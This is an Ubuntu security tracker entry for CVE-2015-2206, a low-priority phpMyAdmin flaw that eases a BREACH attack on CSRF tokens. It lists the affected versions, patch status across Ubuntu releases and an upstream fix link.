CVE-2015-2206

Published: 09 March 2015

libraries/select_lang.lib.php in phpMyAdmin 4.0.x before 4.0.10.9, 4.2.x before 4.2.13.2, and 4.3.x before 4.3.11.1 includes invalid language values in unknown-language error responses that contain a CSRF token and may be sent with HTTP compression, which makes it easier for remote attackers to conduct a BREACH attack and determine this token via a series of crafted requests.

Priority

Low

Status

Package Release Status
phpmyadmin
Launchpad, Ubuntu, Debian
Upstream
Released (4:4.4.4-1, 4.3.11.1)
Ubuntu 21.10 (Impish Indri) Not vulnerable
(4:4.4.5-1)
Ubuntu 21.04 (Hirsute Hippo) Not vulnerable
(4:4.4.5-1)
Ubuntu 20.10 (Groovy Gorilla) Not vulnerable
(4:4.4.5-1)
Ubuntu 20.04 LTS (Focal Fossa) Not vulnerable
(4:4.4.5-1)
Ubuntu 18.04 LTS (Bionic Beaver) Not vulnerable
(4:4.4.5-1)
Ubuntu 16.04 ESM (Xenial Xerus) Not vulnerable
(4:4.4.5-1)
Ubuntu 14.04 ESM (Trusty Tahr) Needed

Patches:
Upstream: https://github.com/phpmyadmin/phpmyadmin/commit/b2f1e895038a5700bf8e81fb9a5da36cbdea0eeb

Notes

AuthorNote
tyhicks
"Versions 4.0.x (prior to 4.0.10.9), 4.2.x (prior to 4.2.13.2) and
4.3.x (prior to 4.3.11.1) are affected."

References